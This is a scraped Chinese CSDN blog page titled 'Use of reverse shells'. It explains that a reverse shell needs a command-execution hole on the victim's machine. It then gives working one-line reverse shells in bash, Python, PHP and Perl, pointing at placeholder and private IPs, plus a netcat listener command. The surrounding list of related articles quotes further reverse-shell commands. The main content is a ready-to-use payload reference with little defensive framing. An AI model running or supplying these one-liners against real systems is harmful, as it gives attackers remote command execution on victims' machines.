反弹shell的使用

最新推荐文章于 2022-11-10 21:20:15 发布
最新推荐文章于 2022-11-10 21:20:15 发布
阅读量219 收藏 1
点赞数
分类专栏: 信息安全 文章标签: shell linux bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csd_ct/article/details/108022543
版权

反弹shell

反弹shell,是指从受害者的机器上主动连接到指定的机器上的可交且能执行命令的TCP进程。反弹shell的前提是受害者的
机器上有命令执行的漏洞。常见的一句话反弹shell,如下:

  • bash 反弹shell
bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 2>&1

参数解释:
bash -i:产生一个bash的交互环境
“>&”:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者,将标准输入0和标准出错2重定向到标准输出

  • python 反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",portn));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • php 反弹shell
php -r '$sock=fsockopen("x.x.x.x",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  • perl 反弹shell
perl -e 'use Socket;$i="192.168.31.41";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

服务端开启监听服务

nc -lvp 9999 
-l:listening  the port
v:列出详细信息
p:端口
csd_ct
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php反弹shell实现代码
10-30
作者想要简化操作流程,因此选择实现了一个反弹Shell到本地监听端口的功能。文档中还提到该代码是在phpspy2008的基础上进行修改,使其成为一个独立的PHP文件,并且上传到服务器上之后,通过设置好反弹的IP和端口来...
Linux上利用scp上传文件一直报告‘no such files or directiony ‘
qq_44211389的博客
03-11 3159
Linux上利用scp上传文件一直报告’no such files or directiony ’ 具体什么原因不太清楚 但是我发现为原来一直在服务器上上传文件(user到host),就一直报错,然后我用了自己的user@user:scp 。。。就成功了(我的是junjunjun@junjunjun:) junjunjun@junjunjun:~$ scp -r /home/junjunjun/Projects/w.py zhangjunkai@xxx.xx.xx.xx:~/ zhangjunkai@1
CVE-2020-15778 OpenSSH命令注入漏洞复现
zyl404的博客
12-18 506
CVE-2020-15778 OpenSSH命令注入漏洞复现 漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。OpenSSH 8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 影响版本 OpenSSH<=8.3p1 环境部署 攻击
反弹shell总结
weixin_51692662的博客
11-10 1108
反弹shell
什么是反弹 Shell
sixqingfeng的博客
07-12 818
前段时间被一位产品经理嘲笑了,说我居然连反弹 Shell 都不知道说实话当时我还真不知道,但这口气咽不下去啊,得赶紧学来看看,这不,我已经学会了学完之后我特地来记录下,同时分享给大家,以后产品经理再也不敢嘲笑我们不懂反弹 Shell 了我们都知道 Shell 的概念吧,简单来说,Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制那反弹 Shell 是啥呢?其英文名叫做 Reverse Shell,具体干什么
反弹shell初识
无痕的博客
11-01 4079
反弹shell的指令与演示
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
为了更好地理解和掌握反弹shell,作者通过思维导图进行了框架整理,这有助于读者系统地了解各种反弹shell命令的原理、使用场景及检测方案。 4. **反弹姿势** 文档详细介绍了按照交互方式划分的五种类型的反弹...
Golang反弹shell使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like ...
LinuxN种反弹shell方法
YUGUOHOU的博客
11-26 9936
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口, 并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络 概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器 (目标ip:目标机器端口),这是比较
linux 反弹脚本,linux反弹shell的原理详解
weixin_36219012的博客
04-30 298
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
为什么要反弹shell
m0_55306747的博客
05-28 498
我也不知道这个比喻恰不恰当: 首先是一个城池,我想要控制这个城,就要控制这个城的城主,我手里有控制当前城主的把柄(shell) 但是我要和城主建立起联系才可以控制他,城外有一座大墙(防火墙),会严格检查入城的人(流量审查),所以我不能入城,一旦入城,城里的人可能会发现异样,将城主换掉(打补丁) 不过好在我发现这个城有一个后门,我虽然进不去,但是我把信送进去了,我不去找他,我让城主来找我,我在信上写了我的地址(ip和端口),然后我在预定的位置等待城主的到来(端口监听) 因为城主是城主出城,当然那个大墙
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
反弹Shell的方式和详解
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
2022渗透测试-反弹shell的详细讲解
保持微笑的博客
02-07 5257
1.反弹shell简介 反弹shell是一种反向链接,与正向的ssh等不同,它是在对方电脑执行命令连接到我方的攻击模式,并且这种攻击模式必须搭配远程执行命令漏洞来使用。 2.为什么要进行反弹shell 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器,这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢: 1. 某客户机中了你的网马,但是它在局域网内,你直接连接不了。 2. 它的ip
【安全】反弹Shell的原理及18般利用姿势
qqchaozai的专栏
12-29 2167
前言 shell:一种用来执行操作系统指令的程序 反弹shell (reverse shell):一种让远程系统执行本地shell的程序。 1 原理 远程系统监听一个TCP/UDP端口,本地系统运行反弹shell反弹shell会连接该端口,并接收远程系统发送的shell指令,执行之后再将指令的输出流转发给远程系统。 1.1文件描述符 ...
反弹shell收不到
最新发布
08-23
2. 目标主机的网络配置阻止了反弹Shell使用的端口。 3.反弹Shell的监听器没有正确设置或运行,或者监听器使用的端口与反弹Shell脚本中指定的不一致。 4.Shell命令执行中存在语法错误,或者目标系统上没有安装必要的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值